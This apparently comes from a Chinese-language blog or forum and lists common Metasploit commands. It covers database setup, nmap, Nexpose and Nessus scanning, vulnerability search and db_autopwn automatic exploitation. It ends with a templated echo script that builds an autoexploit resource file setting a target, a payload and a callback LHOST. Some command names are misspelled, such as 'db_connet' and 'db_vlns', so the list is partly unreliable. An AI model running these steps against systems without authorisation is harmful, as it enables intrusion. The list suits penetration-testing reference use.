Metasploit常用命令汇总

Mercia ·
更新时间:2024-11-14
· 804 次阅读

  1.连接数据并显示一些信息   db_connet username:password@ip address/database name   db_destroy 同上   db_import 文件名字   db_hosts -c address,svcs,vulns   // 显示ip地址,服务器,漏洞数   db_vlns   // 显示漏洞名字   2.nmap扫描   db_nmap -sS -nP ip address   db_nmap -h   3.nexpose在metasploit的使用   load nexpose // 加载nexpose插件   nexpose -h   nexpose_connect 用户名:密码@ip地址:端口号  认证字符   nexpose_scan ip地址   db_hosts -c address     // 显示漏洞信息   4.nessus在metasploit的使用   load nessus   nessus_connect 用户名:密码@ip地址:端口号  认证字符   nessus_policy_list //显示策略列表   nessus_scan_new   nessus_scan_new 2 bridge_scan ip地址   nessus_scan_status   //显示状态   nessus_report_list    // 报告列表   nessus_report_get 报告名字   // 显示报告   db_hosts -c address,svcs,vlns   db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞   5.搜索漏洞   search mysql   // 搜索mysql的漏洞   6.保存metasploit用过的命令到文件   makerc  路径/文件名字   自动审计,运行检测   7.脚本如下   echo use 漏洞名字 >autoexploit.rc   echo set RHOST IP地址 >> autoexploit.rc   echo set PAYLOAD shellcode名字 >> autoexploit.rc   echo set LHOST IP地址 >> autoexploit.rc   echo exploit >> autoexploit.rc



metasploit

需要 登录 后方可回复, 如果你还没有账号请 注册新账号